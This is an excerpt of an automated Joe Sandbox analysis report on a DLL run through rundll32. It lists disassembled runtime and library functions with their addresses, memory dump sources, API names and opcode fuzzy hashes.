                                                                                                                                                                                                                            • Instruction ID: 8344979c66b9cceb0b7acf630f590e38be3bd2ff735d44e9d3a026d285abadf4
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5368d8b1d24fe0368cc4e10c75a835cf7b4598258ec1be9622bc0c1957234e7a
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F7518A3210468C8AEBA6CF2594447A977A0F358BC4F14C127FB8947BD5CF78D668CB11
                                                                                                                                                                                                                            Function 00000001800117A4 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 37COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: NameName::snprintfswprintf
                                                                                                                                                                                                                            • String ID: %lf
                                                                                                                                                                                                                            • API String ID: 3974891382-2891890143
                                                                                                                                                                                                                            • Opcode ID: 7fc1947d49ae169c503500e1267cacb441c981dc534258eb13393c19efbd0a35
                                                                                                                                                                                                                            • Instruction ID: 1d1499fd28cd0defdd0e894b6a29d0ba661b97baa627992bc5e4fd3905ed2300
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7fc1947d49ae169c503500e1267cacb441c981dc534258eb13393c19efbd0a35
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1C01A221614B9840FB929B25B8013DBA361BF9A7C4F54C322BE5967B65DE2CC2578700
                                                                                                                                                                                                                            Function 0000000180011834 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: NameName::snprintfswprintf
                                                                                                                                                                                                                            • String ID: %lf
                                                                                                                                                                                                                            • API String ID: 3974891382-2891890143
                                                                                                                                                                                                                            • Opcode ID: 43343db7a5785d265fd779c02874dbd2acc63c014a2a9ae2f7173fd214bdd341
                                                                                                                                                                                                                            • Instruction ID: e8046b89d42cedcdfa3f71cef9b3097e4d32cbc59f7538c484cb4a0ec4f8bfae
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 43343db7a5785d265fd779c02874dbd2acc63c014a2a9ae2f7173fd214bdd341
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5AF08631614BD890FB569B25B8013DBA361BF997C4F54C321BE5957B65CE3CC2578700
                                                                                                                                                                                                                            Function 0000000180056664 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetConsoleMode.KERNEL32(?,?,?,?,000000018001AF96,?,?,000000018001AF96,000000018001AF96,?,000000018001AF96,000000018001AF96,0000000180056604), ref: 0000000180056787
                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,000000018001AF96,?,?,000000018001AF96,000000018001AF96,?,000000018001AF96,000000018001AF96,0000000180056604), ref: 0000000180056811
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ConsoleErrorLastMode
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 953036326-0
                                                                                                                                                                                                                            • Opcode ID: b2a80129a009847c2ce996616dbbe413a05851c68b0ba3fa64774bcca3876923
                                                                                                                                                                                                                            • Instruction ID: 1260cb0f68ca8a8ce6bcd19fd34b1b076e826746dc0d6dce6279d08af0310b67
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b2a80129a009847c2ce996616dbbe413a05851c68b0ba3fa64774bcca3876923
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E991E472F14A5885FBA2CB6594407ED2BA4F34CBD8F448205FE4A776A5CF36C68AC710
                                                                                                                                                                                                                            Function 0000000180014FCC Relevance: 6.2, APIs: 4, Instructions: 193COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Name::operator+
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2943138195-0
                                                                                                                                                                                                                            • Opcode ID: 833d5f12b3745b43fcb298177fc6e3fb40fcfb7b31867bf43b28185f1c8aef01
                                                                                                                                                                                                                            • Instruction ID: be38e034833b563642ed2c4684e659858a25fcc5f3f681f84aaac44cdb52407b
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 833d5f12b3745b43fcb298177fc6e3fb40fcfb7b31867bf43b28185f1c8aef01
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8D915D77A00B98C9FB938BA4D8403DC37B1B30D789F65C015EE892B695DF798A49C741
                                                                                                                                                                                                                            Function 0000000180017CB4 Relevance: 6.1, APIs: 4, Instructions: 87COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Name::operator+$Replicator::operator[]
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3863519203-0
                                                                                                                                                                                                                            • Opcode ID: ab40c895ed32f951a42b94f9895b2f8f6206b0eb416bcb5b27eecb077ca5f57b
                                                                                                                                                                                                                            • Instruction ID: 4055e878f64a0d4d9d529e2badb35a1d8728a1b9fc24d6f266f1b5ddb2a3fbf8
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ab40c895ed32f951a42b94f9895b2f8f6206b0eb416bcb5b27eecb077ca5f57b
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4A412576A00B8899EB42CFA4E8403EC37B0F748B98F64C415EE495B79ADF78C649C750
                                                                                                                                                                                                                            Function 000000018000DD24 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 163COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: __except_validate_context_record
                                                                                                                                                                                                                            • String ID: csm$csm
                                                                                                                                                                                                                            • API String ID: 1467352782-3733052814
                                                                                                                                                                                                                            • Opcode ID: 1f78ce30d5d3abf011c49c12d0b77ceb6a2fa33deb273aa3e414b84e124295c9
                                                                                                                                                                                                                            • Instruction ID: 9c4d39e4c652f3945ef35df7601ed0ac793b78f7d53c8ab04d9db08b0d63a189
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1f78ce30d5d3abf011c49c12d0b77ceb6a2fa33deb273aa3e414b84e124295c9
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B27191721046888ADBA2DF25D4507ADBBA0F348BC9F14C126FB8947B89CF38C699C751
                                                                                                                                                                                                                            Function 000000018000A630 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 154COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Unwind__except_validate_context_record
                                                                                                                                                                                                                            • String ID: csm
                                                                                                                                                                                                                            • API String ID: 2208346422-1018135373
                                                                                                                                                                                                                            • Opcode ID: 41b12dda0e093764b089897d1ff21e540db28dc560569149afab03f8e9fdc7c2
                                                                                                                                                                                                                            • Instruction ID: 2672bec40da291ce11c6250c0dad722d8f4cfd31cfcba8b085e74eb73a93bdbb
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 41b12dda0e093764b089897d1ff21e540db28dc560569149afab03f8e9fdc7c2
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FC51F7323196088AFB96CF15E844BAD33A5F749BC8F50C121FA4A47789EF79CA49C700
                                                                                                                                                                                                                            Function 0000000180044C2C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                            • String ID: .$_.,
                                                                                                                                                                                                                            • API String ID: 3215553584-3384562259
                                                                                                                                                                                                                            • Opcode ID: c5e31342db8f2559d412056efb8cb4ce2ddbaaf83501e9c59faeafa9e2557006
                                                                                                                                                                                                                            • Instruction ID: 86f15d9f2fdf1f05cb57339bd986fd197501509ab2478ee385be308a635b250d
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c5e31342db8f2559d412056efb8cb4ce2ddbaaf83501e9c59faeafa9e2557006
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9B41E277A10A4885FBF28A2594C17E92290E78CBE8F57C611FA550B6C5DF74CB8D8708
                                                                                                                                                                                                                            Function 000000018000E744 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 117COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CreateFrameInfo__except_validate_context_record
                                                                                                                                                                                                                            • String ID: csm
                                                                                                                                                                                                                            • API String ID: 2558813199-1018135373
                                                                                                                                                                                                                            • Opcode ID: 3012941d225893ff0a1596aed794f60caa97295d49179766bd7cee36fad85c83
                                                                                                                                                                                                                            • Instruction ID: 98e23b6382448741e885f2483867041e669b118fd1c307fb1a3f8b737a70bd12
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3012941d225893ff0a1596aed794f60caa97295d49179766bd7cee36fad85c83
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 37513C7321578886E6A1EF15E4403AE77A4F38DBE0F148125FB8947B96DF38C565CB00
                                                                                                                                                                                                                            Function 000000018004CAF0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 115COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: memcpy_s
                                                                                                                                                                                                                            • String ID: s
                                                                                                                                                                                                                            • API String ID: 1502251526-453955339
                                                                                                                                                                                                                            • Opcode ID: d69b12cfc8f0d4f7e4e881a0439bac03a6efd0e78ae662d86089a4382a233e0c
                                                                                                                                                                                                                            • Instruction ID: 8ceb7f17a8548fb968498d81ab2351303633656c3688867a1d3cd218ddfc299c
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d69b12cfc8f0d4f7e4e881a0439bac03a6efd0e78ae662d86089a4382a233e0c
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 43411332304A4887E3EA8F15E495FED7791F39878CF028116DE0957B81CB38CA4ACB49
                                                                                                                                                                                                                            Function 0000000180014EB8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 68COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Name::operator+
                                                                                                                                                                                                                            • String ID: void$void
                                                                                                                                                                                                                            • API String ID: 2943138195-3746155364
                                                                                                                                                                                                                            • Opcode ID: ddeb0843d538297d14c0c0f86e427d1c8d1caa5713f6d320f941b1835034666f
                                                                                                                                                                                                                            • Instruction ID: 9e6cfc430d5bfee4d664579300960906288245c07229e058c69c646796c75a2c
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ddeb0843d538297d14c0c0f86e427d1c8d1caa5713f6d320f941b1835034666f
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A6311D76A10B58D8FB52CBA4E8403EC37B0B74C788F54852AEE4A67B55DF388259C750
                                                                                                                                                                                                                            Function 000000018001037C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                                                                            • String ID: csm
                                                                                                                                                                                                                            • API String ID: 2573137834-1018135373
                                                                                                                                                                                                                            • Opcode ID: f9df25044fb1202a836735dffd389a5b3e506e3fb2604136da670c11918c1c4a
                                                                                                                                                                                                                            • Instruction ID: 75816c31b48d4b3f6ac9eaf605c0ba6bcc738f1132b3e0c24f52f264a28ed543
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f9df25044fb1202a836735dffd389a5b3e506e3fb2604136da670c11918c1c4a
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B811FB32214B4482EBA28B15E44039A77E5F78CBD8F688225EADD07759DF7DC655CB00
                                                                                                                                                                                                                            Function 000000018000FCAC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 27libraryCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ErrorLastLibraryLoad
                                                                                                                                                                                                                            • String ID: api-ms-
                                                                                                                                                                                                                            • API String ID: 3568775529-2084034818
                                                                                                                                                                                                                            • Opcode ID: 3ce1118a3d68641cf7bcb52c8cfbeb9de588c640064439e36528d49136769137
                                                                                                                                                                                                                            • Instruction ID: d49a7e86271a456fbcda335a6394c0a77c9d8b30d4fb553590f1245fc1ea6585
